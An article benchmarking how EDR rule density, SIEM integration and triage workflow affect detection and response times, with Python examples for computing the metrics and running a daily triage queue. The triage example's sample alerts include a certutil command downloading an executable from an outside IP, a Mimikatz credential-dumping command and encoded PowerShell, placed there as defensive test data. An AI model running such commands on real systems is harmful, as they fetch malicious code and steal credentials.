Benchmark Study: MTTD and MTTR Across EDR Configurations in 180-Day Controlled Simulations
Benchmark study — mean time to detect and mean time to respond across different EDR alerting strategies, rule density configurations, and SIEM integration patterns, measured over 180 days of controlled adversary simulations.
This benchmark study ran controlled adversary simulations across six different EDR configurations over 180 days in Threatstealth-operated lab environments. The goal was to measure how configuration choices — alerting strategy, rule density, SIEM integration, and triage workflow — affect MTTD and MTTR independently of threat actor behaviour.
Configurations Tested
| Config | Alert strategy | Rule density | SIEM integration | Triage workflow |
|---|---|---|---|---|
| A (baseline) | Default vendor rules | Low | None | Ad-hoc |
| B | Default vendor rules | High | None | Ad-hoc |
| C | Default vendor rules | Low | Bidirectional | Ad-hoc |
| D | Default vendor rules | High | Bidirectional | Ad-hoc |
| E | Custom tuned rules | Medium | Bidirectional | Structured daily |
| F (optimised) | Custom tuned rules + LOLBAS | Medium | Bidirectional | Structured daily + automation |
MTTD Results
The most counter-intuitive finding: high rule density (Config B vs A) increased MTTD by 34%. More rules generate more alerts; more alerts create backlog; backlog delays triage; delayed triage increases MTTD. Alert volume is the enemy of MTTD — not detection coverage.
SIEM integration (Config C vs A) reduced MTTD by 28% independently of rule density, by providing correlation context that accelerated analyst triage decisions.
| Config | Median MTTD | vs. Baseline | Key factor |
|---|---|---|---|
| A (baseline) | 14.8 hours | — | Default rules, no SIEM, ad-hoc triage |
| B | 19.8 hours | +34% | High rule density overwhelms triage capacity |
| C | 10.7 hours | -28% | SIEM correlation reduces per-alert investigation time |
| D | 16.2 hours | +9% | SIEM benefit cancelled by high-density alert noise |
| E | 5.4 hours | -64% | Custom rules reduce noise; structured triage reduces queue |
| F (optimised) | 2.1 hours | -86% | Full optimisation: tuned rules + SIEM + structured triage + automation |
MTTR Results
MTTR was most strongly affected by SIEM integration and triage workflow structure. Bidirectional SIEM integration (EDR feeding the SIEM, and the SIEM feeding correlation context back to the EDR) reduced MTTR by 61% with default rules (Config C vs A), and the benefit persisted at -51% even when high rule density was also present (Config D vs A). Adding structured daily triage on top of SIEM integration, with the same rules, reduced MTTR by a further 43%; Config E, which combined structured triage with custom tuned rules, brought median MTTR from 3.3 days (Config C) down to 1.9 days.
| Config | Median MTTR | vs. Baseline |
|---|---|---|
| A (baseline) | 8.4 days | — |
| B | 10.1 days | +20% |
| C | 3.3 days | -61% |
| D | 4.1 days | -51% |
| E | 1.9 days | -77% |
| F (optimised) | 0.7 days | -92% |
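The medians and "vs. baseline" percentages in the two tables above are straightforward to reproduce from raw incident records, and the same computation is what a weekly MTTD/MTTR KPI needs. The following is an added example, not code from the benchmark: the incident rows are constructed, and the record layout (config, first malicious activity, first triaged alert, containment) and the metric boundaries are assumptions, since the page does not define where MTTD ends and MTTR begins. One point the tables cannot show is handled explicitly: an intrusion that is never detected inside the window has no MTTD sample and must be reported as missed, not silently dropped, or the median flatters the configuration.

```python
"""Median MTTD / MTTR per EDR configuration, with change vs. a baseline config.

Added example, not code from the benchmark. The incident records below are
constructed for illustration; the record layout and the metric boundaries
(MTTD = first malicious activity -> alert triaged, MTTR = alert triaged ->
containment) are assumptions of this example.
"""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import median

# Constructed sample incidents from simulated intrusions (ISO-8601 UTC).
# A None triage time means the intrusion was never detected inside the window
# (right-censored); such rows are counted as missed rather than dropped.
# Fields: config, first_malicious_activity, first_alert_triaged, contained
SAMPLE_INCIDENTS = [
    ("A", "2024-03-01T08:00:00Z", "2024-03-01T18:00:00Z", "2024-03-07T18:00:00Z"),
    ("A", "2024-03-03T08:00:00Z", "2024-03-03T22:48:00Z", "2024-03-12T08:24:00Z"),
    ("A", "2024-03-05T08:00:00Z", "2024-03-06T04:00:00Z", "2024-03-18T04:00:00Z"),
    ("A", "2024-03-07T08:00:00Z", None, None),
    ("C", "2024-03-01T08:00:00Z", "2024-03-01T16:00:00Z", "2024-03-03T16:00:00Z"),
    ("C", "2024-03-03T08:00:00Z", "2024-03-03T18:42:00Z", "2024-03-07T01:54:00Z"),
    ("C", "2024-03-05T08:00:00Z", "2024-03-05T23:00:00Z", "2024-03-10T23:00:00Z"),
]


def parse_ts(value):
    """Parse an ISO-8601 UTC timestamp ending in 'Z'; None passes through."""
    if value is None:
        return None
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def collect_durations(incidents):
    """Per config: MTTD samples (hours), MTTR samples (days) and the missed count."""
    per_config = defaultdict(lambda: {"mttd_h": [], "mttr_d": [], "missed": 0})
    for config, activity, triaged, contained in incidents:
        t0, t1, t2 = parse_ts(activity), parse_ts(triaged), parse_ts(contained)
        bucket = per_config[config]
        if t1 is None:                      # never detected: no MTTD sample
            bucket["missed"] += 1
            continue
        if t1 < t0 or (t2 is not None and t2 < t1):
            raise ValueError(f"non-monotonic timestamps for {config} at {activity}")
        bucket["mttd_h"].append((t1 - t0).total_seconds() / 3600)
        if t2 is not None:                  # containment may still be open
            bucket["mttr_d"].append((t2 - t1).total_seconds() / 86400)
    return dict(per_config)


def median_metrics(incidents):
    """Median MTTD (hours) and MTTR (days) per config, plus detected/missed counts."""
    out = {}
    for config, s in collect_durations(incidents).items():
        out[config] = {
            "mttd_h": round(median(s["mttd_h"]), 1) if s["mttd_h"] else None,
            "mttr_d": round(median(s["mttr_d"]), 1) if s["mttr_d"] else None,
            "detected": len(s["mttd_h"]),
            "missed": s["missed"],
        }
    return out


def pct_change(value, baseline):
    """Percentage change of value relative to baseline, rounded to a whole percent."""
    return round((value - baseline) / baseline * 100)


def benchmark_table(incidents, baseline="A"):
    """Rows: (config, MTTD h, MTTR d, %MTTD vs base, %MTTR vs base, missed)."""
    metrics = median_metrics(incidents)
    base = metrics[baseline]
    rows = []
    for config in sorted(metrics):
        m = metrics[config]
        rows.append((config, m["mttd_h"], m["mttr_d"],
                     pct_change(m["mttd_h"], base["mttd_h"]),
                     pct_change(m["mttr_d"], base["mttr_d"]),
                     m["missed"]))
    return rows


if __name__ == "__main__":
    print("config  MTTD(h)  MTTR(d)  vs base MTTD  vs base MTTR  missed")
    for row in benchmark_table(SAMPLE_INCIDENTS):
        print("{:<7} {:>7} {:>8} {:>+12}% {:>+12}% {:>7}".format(*row))
```

With the constructed rows, Config C comes out at -28% MTTD and -61% MTTR against Config A, the same arithmetic as the tables. Run it weekly over that week's incidents per configuration to get the operational KPI the recommendations call for, and report the missed count beside the median.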
The Highest-Leverage Configuration Change
The single highest-leverage configuration change was not a new detection rule or a more expensive tool. It was structured alert triage: a defined daily window (30–60 minutes, morning) in which all critical and high alerts are reviewed in priority order with a defined disposition workflow.
Without structured triage, even well-tuned EDR configurations with SIEM integration left critical alerts unactioned for days. With structured triage, even the baseline configuration (Config A) improved MTTR by 43% compared to ad-hoc triage.
- Structured triage impact on MTTD: -39% vs. ad-hoc triage with same rules and SIEM
- Structured triage impact on MTTR: -43% vs. ad-hoc triage with same rules and SIEM
- Alert automation impact on MTTR: -28% vs. structured triage alone (auto-closing known false-positive patterns)
- Rule tuning impact on MTTD: -51% vs. default vendor rules at the same rule density
- Combined effect (Config F): -86% MTTD, -92% MTTR vs. baseline Config A
Recommendations
- Reduce rule density before adding new rules — remove or suppress any rule with a >70% false-positive rate, computed from analyst dispositions over enough alerts for the rate to be meaningful
- Implement SIEM bidirectional integration as the highest-priority infrastructure investment
- Establish structured daily triage before any other workflow change — it is the highest-leverage and lowest-cost intervention
- Prioritise LOLBAS and credential theft detection rules — highest-fidelity, lowest false-positive category in the benchmark
- Measure MTTD and MTTR per-configuration weekly — treat them as operational KPIs, not annual audit metrics
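The three workflow interventions the study credits most (the structured daily triage window with a defined disposition workflow, automation that auto-closes known false-positive patterns, and suppression of rules above the 70% false-positive threshold) can be expressed as one small pipeline that produces the morning queue. The following is an added example and not the benchmark's tooling: every alert, historical disposition and known-benign pattern in it is constructed, the rule names and regexes are illustrative, and the minimum-sample guard is an assumption added here so that a rule is not suppressed on the strength of a handful of alerts.

```python
"""Structured daily triage: suppress high-FP rules, auto-close known-benign
patterns, and emit a priority-ordered queue with a fixed disposition set.

Added example, not the benchmark's tooling. Alerts, dispositions and patterns
are constructed; the 70% threshold is the article's recommendation, the
MIN_SAMPLES guard and all rule names are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone

FP_SUPPRESS_THRESHOLD = 0.70   # article: suppress rules with >70% false-positive rate
MIN_SAMPLES = 20               # assumption: do not judge a rule on a handful of alerts
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}
DISPOSITIONS = ("true_positive", "benign_true_positive", "false_positive", "duplicate")

# Constructed: (rule, disposition) pairs recorded in earlier triage windows.
HISTORICAL = (
    [("noisy_powershell_encoded", "false_positive")] * 40
    + [("noisy_powershell_encoded", "true_positive")] * 8
    + [("lsass_handle_mimikatz", "true_positive")] * 9
    + [("lsass_handle_mimikatz", "false_positive")] * 1
    + [("new_rule_sparse", "false_positive")] * 3      # 100% FP but too few samples
)

# Constructed known-benign patterns: (rule, process regex, command-line regex).
KNOWN_FP_PATTERNS = [
    ("certutil_lolbas", re.compile(r"certutil\.exe$", re.I), re.compile(r"-hashfile", re.I)),
    ("schtasks_create", re.compile(r"schtasks\.exe$", re.I), re.compile(r"\\UpdateOrchestrator\\", re.I)),
]

# Constructed open alerts at the start of the triage window.
OPEN_ALERTS = [
    {"id": 101, "rule": "certutil_lolbas", "severity": "high", "host": "ws-17",
     "process": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\tools\agent.msi SHA256",
     "created": "2024-03-11T06:10:00Z"},
    {"id": 102, "rule": "certutil_lolbas", "severity": "high", "host": "ws-22",
     "process": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.9/a.exe a.exe",
     "created": "2024-03-11T07:05:00Z"},
    {"id": 103, "rule": "lsass_handle_mimikatz", "severity": "critical", "host": "srv-db1",
     "process": r"C:\Users\Public\m.exe", "cmdline": "m.exe sekurlsa::logonpasswords",
     "created": "2024-03-10T23:40:00Z"},
    {"id": 104, "rule": "noisy_powershell_encoded", "severity": "high", "host": "ws-03",
     "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc SQBFAFgA", "created": "2024-03-11T08:00:00Z"},
    {"id": 105, "rule": "schtasks_create", "severity": "medium", "host": "ws-09",
     "process": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /Create /TN \Microsoft\Windows\UpdateOrchestrator\Reboot",
     "created": "2024-03-11T05:30:00Z"},
]


def parse_ts(value):
    """Parse an ISO-8601 UTC timestamp ending in 'Z'."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def false_positive_rates(history):
    """Per rule: (false-positive rate, total dispositions)."""
    counts = defaultdict(lambda: [0, 0])          # rule -> [false positives, total]
    for rule, disposition in history:
        counts[rule][1] += 1
        counts[rule][0] += disposition == "false_positive"
    return {rule: (fp / total, total) for rule, (fp, total) in counts.items()}


def rules_to_suppress(history, threshold=FP_SUPPRESS_THRESHOLD, min_samples=MIN_SAMPLES):
    """Rules above the FP threshold, judged only on at least min_samples alerts."""
    return {rule for rule, (rate, total) in false_positive_rates(history).items()
            if total >= min_samples and rate > threshold}


def matches_known_fp(alert):
    """True if rule, process and command line all match a known-benign pattern."""
    return any(alert["rule"] == rule and proc.search(alert["process"])
               and cmd.search(alert["cmdline"]) for rule, proc, cmd in KNOWN_FP_PATTERNS)


def run_triage_window(alerts, history, now_iso):
    """Return (queue, auto_closed_ids, suppressed_ids) for one triage window.

    queue holds critical/high alerts, highest severity then oldest first, each
    with its age in hours and a 'pending' disposition to be set from DISPOSITIONS.
    Suppressed alerts are recorded (for rule tuning), not deleted.
    """
    now = parse_ts(now_iso)
    suppressed_rules = rules_to_suppress(history)
    queue, auto_closed, suppressed = [], [], []
    for alert in alerts:
        if alert["rule"] in suppressed_rules:
            suppressed.append(alert["id"])
        elif matches_known_fp(alert):
            auto_closed.append(alert["id"])
        elif alert["severity"] in ("critical", "high"):
            age_h = round((now - parse_ts(alert["created"])).total_seconds() / 3600, 1)
            queue.append({**alert, "age_h": age_h, "disposition": "pending"})
    queue.sort(key=lambda a: (SEVERITY_RANK[a["severity"]], a["created"]))
    return queue, auto_closed, suppressed


if __name__ == "__main__":
    queue, closed, dropped = run_triage_window(OPEN_ALERTS, HISTORICAL, "2024-03-11T09:00:00Z")
    for a in queue:
        print(f"{a['severity']:<8} age {a['age_h']:>5}h  #{a['id']} {a['rule']} on {a['host']}")
    print("auto-closed:", closed, " suppressed:", dropped)
```

On the constructed input the queue contains only the LSASS access and the certutil download, in that order; the certutil hash check and the UpdateOrchestrator task are auto-closed, and the encoded-PowerShell alert is held back because its rule runs at 83% false positives over 48 dispositions. The three-sample rule is left alone by the MIN_SAMPLES guard, which is the check to keep when applying the 70% recommendation to freshly deployed rules.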